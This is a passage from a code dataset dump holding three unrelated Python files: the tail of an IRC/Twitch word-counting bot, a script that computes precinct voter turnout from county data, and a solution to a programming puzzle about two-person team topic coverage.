periodts:\n\t\t\t\t\tbreak\n\n\t\t\t\tuser_words = all_user_words[user]\n\t\t\t\tif word not in user_words:\n\t\t\t\t\tword_counts[word] += 1\n\t\t\t\t\tuser_words.add(word)\n\n\t\tself.report_counts(event, word_counts)\n\n\tdef cmd_countint(self, event, minint=None, maxint=None):\n\t\t\"\"\"\n\t\t\tCount integer numbers.\n\t\t\tEvery number is only counted once per user.\n\t\t\"\"\"\n\t\ttimestamp = timegm(gmtime())\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tminint = parse_int_bound(minint) if minint is not None else data.minint\n\t\tmaxint = parse_int_bound(maxint) if 
maxint is not None else data.maxint\n\t\tperiodts = timestamp - data.period\n\t\tchannel_counts = data.counts\n\t\tall_user_words = defaultdict(set)\n\n\t\tword_counts = defaultdict(int)\n\t\tfor user, word, timestamp in reversed(channel_counts):\n\t\t\tif timestamp < periodts:\n\t\t\t\tbreak\n\n\t\t\ttry:\n\t\t\t\tnum = int(word, 10)\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tuser_words = all_user_words[user]\n\t\t\t\tif minint is not None and num < minint:\n\t\t\t\t\tpass\n\t\t\t\telif maxint is not None and num > maxint:\n\t\t\t\t\tpass\n\t\t\t\telif num not in user_words:\n\t\t\t\t\tword_counts[num] += 1\n\t\t\t\t\tuser_words.add(num)\n\n\t\tself.report_counts(event, word_counts)\n\n\tcmd_countinit = cmd_countint\n\tcmd_intcount = cmd_countint\n\tcmd_initcount = cmd_countint\n\n\tdef cmd_count1(self, event):\n\t\t\"\"\"\n\t\t\tCount all one-letter words.\n\t\t\tEvery word is only counted once per user.\n\t\t\"\"\"\n\t\ttimestamp = timegm(gmtime())\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tperiodts = timestamp - data.period\n\t\tchannel_counts = data.counts\n\t\tall_user_words = defaultdict(set)\n\n\t\tword_counts = defaultdict(int)\n\t\tfor user, word, timestamp in reversed(channel_counts):\n\t\t\tif timestamp < periodts:\n\t\t\t\tbreak\n\n\t\t\tif len(word) == 1:\n\t\t\t\tuser_words = all_user_words[user]\n\t\t\t\tif not word in user_words:\n\t\t\t\t\tword_counts[word] += 1\n\t\t\t\t\tuser_words.add(word)\n\n\t\tself.report_counts(event, word_counts)\n\n\tdef cmd_clearcount(self, event):\n\t\t\"\"\"\n\t\t\tClear all counts of this channel. Only allowed for operators etc.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tif self.is_allowed(sender, channel):\n\t\t\tdata = self.channel_data[channel]\n\t\t\trowcount = len(data.counts)\n\t\t\tdel data.counts[:]\n\t\t\tself.answer(event, 'Deleted %d rows.' 
% rowcount if rowcount != 1 else 'Deleted 1 row.')\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef cmd_countminint(self, event, value=None):\n\t\t\"\"\"\n\t\t\tGet or set channel default minimum integer for !countint.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tif value is None:\n\t\t\tself.answer(event, \"@%s: !countint minimum is %s.\" % (sender, data.minint if data.minint is not None else 'unbounded'))\n\t\telif self.is_allowed(sender, channel):\n\t\t\tdata.minint = parse_int_bound(value)\n\t\t\tself.answer(event, \"@%s: Changed !countint minimum to %s\" % (sender, data.minint if data.minint is not None else 'unbounded'))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tcmd_countintmin = cmd_countminint\n\n\tdef cmd_countmaxint(self, event, value=None):\n\t\t\"\"\"\n\t\t\tGet or set channel default maximum integer for !countint.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tif value is None:\n\t\t\tself.answer(event, \"@%s: !countint maximum is %s.\" % (sender, data.maxint if data.maxint is not None else 'unbounded'))\n\t\telif self.is_allowed(sender, channel):\n\t\t\tdata.maxint = parse_int_bound(value)\n\t\t\tself.answer(event, \"@%s: Changed !countint maximum to %s\" % (sender, data.maxint if data.maxint is not None else 'unbounded'))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tcmd_countintmax = cmd_countmaxint\n\n\tdef cmd_count_result_limit(self, event, value=None):\n\t\t\"\"\"\n\t\t\tGet or set channel default result list entry limit.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tif value is None:\n\t\t\tself.answer(event, \"@%s: Count result list entry limit is %s.\" % (sender, data.result_limit if data.result_limit is not None else 'unlimited'))\n\t\telif self.is_allowed(sender, channel):\n\t\t\tdata.result_limit = parse_int_bound(value)\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef cmd_countleave(self, event):\n\t\t\"\"\"\n\t\t\tMake WordCountBot leave this channel. 
Only allowed for operators of the given channel.\n\t\t\"\"\"\n\t\tself.home_cmd_leave(event, event.target)\n\n\tdef home_cmd_commands(self, event):\n\t\t\"\"\"\n\t\t\tShow the list of commands.\n\t\t\"\"\"\n\t\tchannel_commands = []\n\t\thome_commands = []\n\t\tsender = event.source.nick\n\t\tfor name in dir(self):\n\t\t\tif name.startswith('cmd_'):\n\t\t\t\tif getattr(self, name).__name__ == name:\n\t\t\t\t\t# otherwise its an alias\n\t\t\t\t\tchannel_commands.append('!'+name[4:])\n\n\t\t\telif name.startswith('home_cmd_'):\n\t\t\t\tif getattr(self, name).__name__ == name:\n\t\t\t\t\t# otherwise its an alias\n\t\t\t\t\thome_commands.append('!'+name[9:])\n\n\t\tchannel_commands.sort()\n\t\thome_commands.sort()\n\t\tmessage = '@%s: Commands: %s' % (sender, ', '.join(channel_commands))\n\t\tif self.home_channel is not None:\n\t\t\tmessage += ' %s-only commands: %s' % (self.home_channel, ', '.join(home_commands))\n\t\tself.answer(event, message)\n\n\tdef home_cmd_help(self, event, command=None):\n\t\t\"\"\"\n\t\t\tShow help to given command.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tif command is None:\n\t\t\tself.answer(event,\n\t\t\t\t\"@%s: type !commands for a list of commands or !help \"\n\t\t\t\t\"for help to !command. For more see: https://github.com/panzi/WordCountBot\" % sender)\n\t\telse:\n\t\t\tchannel = event.target\n\t\t\tif command.startswith('!'):\n\t\t\t\tcommand = command[1:]\n\n\t\t\tif channel == self.home_channel:\n\t\t\t\tmethod = 'home_cmd_'+command\n\t\t\t\tif not hasattr(self, method):\n\t\t\t\t\tmethod = 'cmd_'+command\n\t\t\telse:\n\t\t\t\tmethod = 'cmd_'+command\n\n\t\t\tif hasattr(self, method):\n\t\t\t\tcmd = getattr(self, method)\n\t\t\t\tdoc = cmd.__doc__\n\t\t\t\tusage = ['Usage: !', command]\n\n\t\t\t\tmin_argc = argc = cmd.__code__.co_argcount\n\t\t\t\tif cmd.__defaults__:\n\t\t\t\t\tmin_argc -= len(cmd.__defaults__)\n\n\t\t\t\tvarnames = cmd.__code__.co_varnames\n\t\t\t\tfor i in range(2, min_argc):\n\t\t\t\t\tusage.append(' ')\n\t\t\t\t\tusage.append(varnames[i])\n\n\t\t\t\tfor i in range(min_argc, argc):\n\t\t\t\t\tusage.append(' [')\n\t\t\t\t\tusage.append(varnames[i])\n\t\t\t\t\tusage.append(']')\n\n\t\t\t\tif cmd.__code__.co_flags & 0x4:\n\t\t\t\t\tusage.append(' [')\n\t\t\t\t\tusage.append(varnames[argc])\n\t\t\t\t\tusage.append('...]')\n\n\t\t\t\tself.answer(event, ''.join(usage))\n\t\t\t\tif doc:\n\t\t\t\t\tdoc = doc.lstrip('\\n').rstrip().split('\\n')\n\t\t\t\t\tfirst = doc[0]\n\t\t\t\t\tindent = first[:len(first) - len(first.lstrip())]\n\t\t\t\t\tindent_len = len(indent)\n\t\t\t\t\tfor line in doc:\n\t\t\t\t\t\tif line.startswith(indent):\n\t\t\t\t\t\t\tline = line[indent_len:]\n\t\t\t\t\t\tself.answer(event, line)\n\t\t\telse:\n\t\t\t\tself.answer(event, \"@%s: No such command !%s\" % (sender, command))\n\n\tdef home_cmd_join(self, event, channel):\n\t\t\"\"\"\n\t\t\tMake WordCountBot join the given channel. Only allowed for operators of the given channel.\n\t\t\"\"\"\n\t\tchannel = normalize_channel(channel)\n\t\tsender = event.source.nick\n\t\tif self.is_allowed(sender, channel):\n\t\t\tself.do_join(channel)\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef home_cmd_gcinterval(self, event, *value):\n\t\t\"\"\"\n\t\t\tGet or set gcinterval. 
WordCountBot-admin only.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tif self.is_allowed(sender, self.home_channel):\n\t\t\tif not value:\n\t\t\t\tself.answer(event, \"@%s: gcinterval = %s\" % (sender, format_time(self.gcinterval)))\n\t\t\telse:\n\t\t\t\tvalue = ' '.join(value)\n\t\t\t\ttry:\n\t\t\t\t\tseconds = parse_time(value)\n\t\t\t\t\tif seconds <= 0:\n\t\t\t\t\t\traise ValueError(value)\n\t\t\t\texcept ValueError as ex:\n\t\t\t\t\tself.answer(event, \"@%s: Illegal gcinterval: %s\" % (sender, value))\n\t\t\t\telse:\n\t\t\t\t\tself.gcinterval = seconds\n\t\t\t\t\tself.answer(event, \"@%s: Changed gcinterval to %s\" % (sender, format_time(self.gcinterval)))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef home_cmd_leave(self, event, channel):\n\t\t\"\"\"\n\t\t\tMake WordCountBot leave the given channel. Only allowed for operators of the given channel.\n\t\t\"\"\"\n\t\tchannel = normalize_channel(channel)\n\t\tsender = event.source.nick\n\t\tif self.is_allowed(sender, channel):\n\t\t\tif channel == self.home_channel:\n\t\t\t\tself.answer(event, \"@%s: Cannot leave home channel.\" % sender)\n\t\t\telse:\n\t\t\t\tself.do_part(channel)\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef home_cmd_channels(self, event):\n\t\t\"\"\"\n\t\tList all channels joined by WordCountBot. WordCountBot-admin only.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tif self.is_allowed(sender, self.home_channel):\n\t\t\tself.answer(event, 'Joined channels: ' + ', '.join(self.channels))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef report_counts(self, event, word_counts):\n\t\tdata = self.channel_data[event.target]\n\t\tperiod = data.period\n\t\tif word_counts:\n\t\t\tresult_limit = data.result_limit\n\t\t\tcounts = list(word_counts.items())\n\t\t\tcounts.sort(key=lambda item: (-item[1], item[0]))\n\t\t\tif result_limit is not None and len(counts) > result_limit:\n\t\t\t\tcounts = counts[:result_limit]\n\t\t\tself.answer(event, 'Word-counts within the last %s: %s' % (\n\t\t\t\tformat_time(period), ' — '.join('%s: %d' % item for item in counts)))\n\t\telse:\n\t\t\tself.answer(event, 'No words counted in the last %s.' 
% format_time(period))\n\n\tdef answer(self, event, message):\n\t\tchannel = event.target\n\t\tnick = self.connection.get_nickname()\n\t\tif event.source.nick != nick or self.channels[channel].is_oper(nick):\n\t\t\tself.chunked_privmsg(channel, message)\n\t\telse:\n\t\t\tself.connection.execute_delayed(1, lambda: self.chunked_privmsg(channel, message))\n\n\tdef _send_raw(self, bytes):\n\t\tif self.connection.socket is None:\n\t\t\traise ServerNotConnectedError(\"Not connected.\")\n\t\ttry:\n\t\t\tself.connection.socket.send(bytes)\n\t\texcept socket.error:\n\t\t\tself.connection.disconnect(\"Connection reset by peer.\")\n\n\tdef chunked_privmsg(self, channel, message):\n\t\tprint('%s: %s' % (channel, message))\n\t\tmaxlen = self.max_message_length\n\t\tchannel_utf8 = channel.encode('utf-8')\n\t\tif maxlen is not None:\n\t\t\tmaxlen -= len(channel_utf8) + 11 # len(\"PRIVMSG \"+...+\" \"+...+\"\\r\\n\")\n\t\t\tif maxlen <= 0:\n\t\t\t\tmaxlen = 8\n\t\tmessage_utf8 = message.encode('utf-8')\n\t\tN = len(message_utf8)\n\t\tif maxlen and N > maxlen:\n\t\t\tindex = 0\n\t\t\twhile index < N:\n\t\t\t\tnext_index = index + maxlen\n\t\t\t\tif next_index >= N:\n\t\t\t\t\tself._send_raw(b''.join((b'PRIVMSG ',channel_utf8,b' :',message_utf8[index:],b'\\r\\n')))\n\t\t\t\t\tbreak\n\n\t\t\t\tspace_index = None\n\t\t\t\tfor i in range(next_index, index - 1, -1):\n\t\t\t\t\tbyte = message_utf8[i]\n\t\t\t\t\tif byte == 32 or byte == 9:\n\t\t\t\t\t\tspace_index = i\n\t\t\t\t\t\tbreak\n\n\t\t\t\tif space_index is None:\n\t\t\t\t\t# at least don't cut in the middle of a multi-byte sequence\n\t\t\t\t\twhile next_index > index:\n\t\t\t\t\t\tbyte = message_utf8[next_index]\n\t\t\t\t\t\tif byte < 128 or byte >= 192:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tnext_index -= 1\n\t\t\t\t\tchunk = message_utf8[index:next_index]\n\t\t\t\telse:\n\t\t\t\t\tchunk = message_utf8[index:space_index].rstrip()\n\t\t\t\t\tnext_index = space_index + 1\n\n\t\t\t\tself._send_raw(b''.join((b'PRIVMSG ',channel_utf8,b' :',chunk,b'\\r\\n')))\n\t\t\t\tindex = next_index\n\t\telse:\n\t\t\tself._send_raw(b''.join((b'PRIVMSG ',channel_utf8,b' :',message_utf8,b'\\r\\n')))\n\n\tdef dump(self):\n\t\treturn {\n\t\t\t'version': '1.0',\n\t\t\t'channels': list(self.joined_channels),\n\t\t\t'default_period': self.default_period,\n\t\t\t'gcinterval': self.gcinterval,\n\t\t\t'channel_data': dict(\n\t\t\t\t(channel, self.channel_data[channel].dump())\n\t\t\t\tfor channel in self.channel_data)\n\t\t}\n\n\tdef load(self, state):\n\t\tversion = state['version']\n\t\tif version != '1.0':\n\t\t\traise ValueError('unsupported state version: %s' % version)\n\n\t\tif 'default_period' in state:\n\t\t\tdefault_period = int(state['default_period'])\n\t\t\tif default_period <= 0:\n\t\t\t\traise ValueError('illegal default period: %r' % default_period)\n\t\t\tself.default_period = default_period\n\t\telse:\n\t\t\tdefault_period = self.default_period\n\n\t\tif 'gcinterval' in state:\n\t\t\tgcinterval = int(state['gcinterval'])\n\t\t\tif gcinterval <= 0:\n\t\t\t\traise ValueError('illegal gcinterval: %r' % gcinterval)\n\t\t\tself.gcinterval = gcinterval\n\n\t\tif 'default_minint' in state:\n\t\t\tdefault_minint = state['default_minint']\n\t\t\tif default_minint is not None:\n\t\t\t\tdefault_minint = int(default_minint)\n\t\t\tself.default_minint = default_minint\n\t\telse:\n\t\t\tdefault_minint = self.default_minint\n\n\t\tif 'default_maxint' in state:\n\t\t\tdefault_maxint = state['default_maxint']\n\t\t\tif default_maxint is not None:\n\t\t\t\tdefault_maxint = 
int(default_maxint)\n\t\t\tself.default_maxint = default_maxint\n\t\telse:\n\t\t\tdefault_maxint = self.default_maxint\n\n\t\tif 'default_result_limit' in state:\n\t\t\tdefault_result_limit = state['default_result_limit']\n\t\t\tif default_result_limit is not None:\n\t\t\t\tdefault_result_limit = int(default_result_limit)\n\t\t\tif default_result_limit < 1:\n\t\t\t\traise ValueError('illegal default_result_limit: %r' % default_result_limit)\n\t\t\tself.default_result_limit = default_result_limit\n\t\telse:\n\t\t\tdefault_result_limit = self.default_result_limit\n\n\t\tif 'channel_data' in state:\n\t\t\tchannel_data = defaultdict(self.make_channel_data)\n\t\t\tfor channel, data in state['channel_data'].items():\n\t\t\t\tperiod = data.get('period', default_period)\n\t\t\t\tminint = data.get('minint', default_minint)\n\t\t\t\tmaxint = data.get('maxint', default_maxint)\n\t\t\t\tresult_limit = data.get('result_limit', default_result_limit)\n\n\t\t\t\trows = data.get('counts')\n\t\t\t\tchannel_counts = []\n\t\t\t\tif rows:\n\t\t\t\t\tfor row in rows:\n\t\t\t\t\t\tif type(row) not in ROW_TYPES or len(row) != 3:\n\t\t\t\t\t\t\traise ValueError('illegal counts-row for channel %s: %r' % (channel, row))\n\n\t\t\t\t\t\tuser, word, timestamp = row\n\n\t\t\t\t\t\tif type(user) is not str or type(word) is not str or type(timestamp) is not int:\n\t\t\t\t\t\t\traise ValueError('illegal counts-row for channel %s: %r' % (channel, row))\n\n\t\t\t\t\t\tchannel_counts.append((user, word, timestamp))\n\n\t\t\t\tchannel_data[channel] = ChannelData(period, minint, maxint, result_limit, channel_counts)\n\t\t\tself.channel_data = channel_data\n\n\t\tif 'channels' in state:\n\t\t\tself.set_join_channels(state['channels'])\n\n\tdef start(self):\n\t\ttry:\n\t\t\tsuper(CounterBot, self).start()\n\t\texcept InterruptedError:\n\t\t\tpass\n\t\tfinally:\n\t\t\tif self.home_channel is not None:\n\t\t\t\tif self.connection.socket:\n\t\t\t\t\tself.chunked_privmsg(self.home_channel, '%s is shutting down.' 
% self.connection.get_nickname())\n\ndef main(args):\n\timport yaml\n\timport argparse\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-c', '--config', default='config.yaml')\n\tparser.add_argument('--env-config', help='read configuration from environment', action='store_true', default=False)\n\topts = parser.parse_args(args)\n\n\tif opts.env_config:\n\t\tconfig = {}\n\t\tfor key in ('host', 'nickname', 'password', 'default_period',\n\t\t            'default_minint', 'default_maxint', 'default_result_limit',\n\t\t            'gcinterval', 'max_message_length', 'state', 'home_channel'):\n\t\t\tenvkey = 'COUNTBOT_'+key.upper()\n\t\t\tvalue = os.getenv(envkey)\n\t\t\tif value:\n\t\t\t\tconfig[key] = value\n\n\t\tfor key in ('channels', 'admins', 'ignore'):\n\t\t\tenvkey = 'COUNTBOT_'+key.upper()\n\t\t\tvalue = os.getenv(envkey)\n\t\t\tif value:\n\t\t\t\tconfig[key] = value.split(',')\n\telse:\n\t\twith open(opts.config,'rb') as fp:\n\t\t\tconfig = yaml.safe_load(fp) # yaml.load() without a Loader argument fails on newer PyYAML\n\n\tserver, port = config.get('host','irc.twitch.tv:6667').split(':', 1)\n\tport = int(port)\n\n\tstatefile = config.get('state')\n\tdefault_minint = config.get('default_minint')\n\tdefault_maxint = config.get('default_maxint')\n\tdefault_result_limit = config.get('default_result_limit')\n\n\tbot = CounterBot(\n\t\tconfig.get('home_channel'),\n\t\tint(config.get('default_period', 60 * 5)),\n\t\tint(config.get('gcinterval', 60 * 10)),\n\t\tint(config.get('max_message_length', 512)),\n\t\tint(default_minint) if default_minint is not None else None,\n\t\tint(default_maxint) if default_maxint is not None else None,\n\t\tint(default_result_limit) if default_result_limit is not None else None,\n\t\tconfig.get('admins') or [],\n\t\tconfig.get('ignore') or [],\n\t\tconfig['nickname'],\n\t\tconfig.get('channels') or [],\n\t\tconfig.get('password'),\n\t\tserver,\n\t\tport)\n\n\tshutdown = lambda signum, frame: bot.disconnect()\n\tsignal.signal(signal.SIGINT, shutdown)\n\tsignal.signal(signal.SIGTERM, shutdown)\n\n\tconfig = parser = opts = None\n\n\tif statefile:\n\t\ttry:\n\t\t\twith open(statefile, 'r') as fp:\n\t\t\t\tprint('Loading state from %s...' % statefile)\n\t\t\t\tstate = yaml.safe_load(fp)\n\t\texcept FileNotFoundError:\n\t\t\tpass\n\t\telse:\n\t\t\tbot.load(state)\n\t\t\tstate = fp = None\n\n\ttry:\n\t\tprint('Starting bot...')\n\t\tbot.start()\n\tfinally:\n\t\tif statefile:\n\t\t\tprint('\\nDumping state to %s...' 
% statefile)\n\t\t\tstate = bot.dump()\n\n\t\t\twith open(statefile, 'w') as fp:\n\t\t\t\tyaml.dump(state, fp)\n\nif __name__ == '__main__':\n\timport sys\n\n\ttry:\n\t\tmain(sys.argv[1:])\n\texcept KeyboardInterrupt:\n\t\tprint()\n","sub_path":"countbot.py","file_name":"countbot.py","file_ext":"py","file_size_in_byte":26815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12136752","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 22:58:58 2022\n\n@author: charliehenry\n\"\"\"\n\nimport pandas as pd\nimport geopandas as gpd\n\nprecincts = gpd.read_file(\"precincts_2022.geojson\")\n\nmail_data = pd.read_excel(\"05.03.22Rosters/05.03.22ByMail.xlsx\", header=3)\n\nearly_data = pd.read_excel(\"05.03.22Rosters/05.03.22EarlyVote.xlsx\", header=3)\n\nregistration = pd.read_csv(\"may-3-22-reg.csv\")\n\n\nmail_data = mail_data.pivot_table(index=\"Precinct\", values=\"VUID\", aggfunc=\"count\")\nmail_data = mail_data.rename(columns={\"VUID\": \"Mail-in Votes\"})\n\nearly_data = early_data.pivot_table(index=\"PCT\", values=\"VUID\", aggfunc=\"count\")\nearly_data = early_data.rename(columns={\"VUID\": \"Early Votes\"})\n\nprecincts[\"Precinct\"] = precincts[\"Precinct\"].astype(int)\nprecincts = precincts.merge(\n    mail_data, left_on=\"Precinct\", right_on=\"Precinct\", how=\"left\"\n)\nprecincts = precincts.merge(early_data, left_on=\"Precinct\", right_on=\"PCT\", how=\"left\")\nprecincts = precincts.merge(\n    registration, left_on=\"Precinct\", right_on=\"Precinct\", how=\"left\"\n)\n\n\nprecincts[\"Early Votes\"] = precincts[\"Early Votes\"].fillna(0)\nprecincts[\"Mail-in Votes\"] = precincts[\"Mail-in Votes\"].fillna(0)\nprecincts[\"Active\"] = precincts[\"Active\"].fillna(0)\nprecincts[\"Suspense\"] = precincts[\"Suspense\"].fillna(0)\nprecincts[\"Total\"] = precincts[\"Total\"].fillna(0)\n\n\nprecincts[\"Total Votes\"] = precincts[\"Mail-in Votes\"] + precincts[\"Early Votes\"]\nprecincts[\"Turnout\"] = precincts[\"Total Votes\"] / precincts[\"VoterCount\"]\n\nprecincts.to_file(\"may-3-22 turnout.geojson\")\n\n\npast_data = gpd.read_file(\"Travis County Turnout.geojson\")\n","sub_path":"maps/May-22 Early Vote.py","file_name":"May-22 Early Vote.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438499229","text":"\"\"\"\nYou are given a list of people who are attending ACM-ICPC World Finals. Each of them is either well versed in a topic or not.\nFind out the maximum number of topics a 2-person team can know. And also find out how many teams can know that maximum number of topics.\n\nNote Suppose a, b, and c are three different people, then (a,b) and (b,c) are counted as two different teams.\n\nInput Format\n\nThe first line contains two integers, N and M, separated by a single space, where N represents the number of people, and M represents the number of topics. N lines follow.\nEach line contains a binary string of length M. 
If the i-th line's j-th character is 1, then the i-th person knows the j-th topic; otherwise, he doesn't know the topic.\n\nConstraints\n2 <= N <= 500\n1 <= M <= 500\n\nOutput Format\n\nOn the first line, print the maximum number of topics a 2-person team can know.\nOn the second line, print the number of 2-person teams that can know the maximum number of topics.\n\nSample Input\n\n4 5\n10101\n11100\n11010\n00101\n\n\nSample Output\n\n5\n2\n\n\nExplanation\n\n(1, 3) and (3, 4) know all the 5 topics. So the maximal topics a 2-person team knows is 5, and only 2 teams can achieve this.\n\"\"\"\n\nn,m = input().strip().split(' ')\nn,m = [int(n),int(m)]\ntopic = []\ntopic_i = 0\nfor topic_i in range(n):\n    topic_t = str(input().strip())\n    topic.append(int(topic_t, 2))\nmax_no_of_topics = -1\nmax_teams = 0\nfor people_i in range(n):\n    people_j = people_i + 1\n    while people_j < n:\n        or_int = topic[people_i] | topic[people_j] # gives the max combination of 1s\n        or_no_of_topics = bin(or_int).count(\"1\")\n        if or_no_of_topics > max_no_of_topics:\n            max_no_of_topics = or_no_of_topics\n            max_teams = 1\n        elif or_no_of_topics == max_no_of_topics:\n            max_teams += 1\n        people_j += 1\nprint(max_no_of_topics)\nprint(max_teams)","sub_path":"Algorithms/implementation/ACM ICPC.py","file_name":"ACM ICPC.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
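# Worked example of the bitwise trick used above: persons '10101' (21) and '11010' (26)
# give 21 | 26 = 0b11111 = 31, and bin(31).count("1") == 5 -- the five topics credited
# to team (1, 3) in the sample explanation.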